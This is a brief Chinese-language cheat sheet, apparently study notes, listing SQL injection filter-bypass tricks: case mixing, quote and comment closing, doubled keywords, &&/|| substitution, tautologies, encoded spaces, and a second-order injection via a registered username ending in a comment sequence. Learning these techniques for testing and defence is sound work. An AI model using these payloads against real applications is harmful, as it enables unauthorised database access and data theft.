提示:
一、大小写绕过
select * from user where name = 'aaa' AND age = 18
2.单双引号 注释 过滤
user where id = 1 and '1' = '1
3.双写绕过
aandnd
4.关键字过滤
and = && or = ||
5.全部查出来 参数污染 一个成立即可
where 1 or 1=2
6.空格过滤
%a0 %20 等
7.大小写
seLect
二次注入
注册一个用户
user = feixiang --+
更改密码的时候
feixiang -- +
where feixiang --+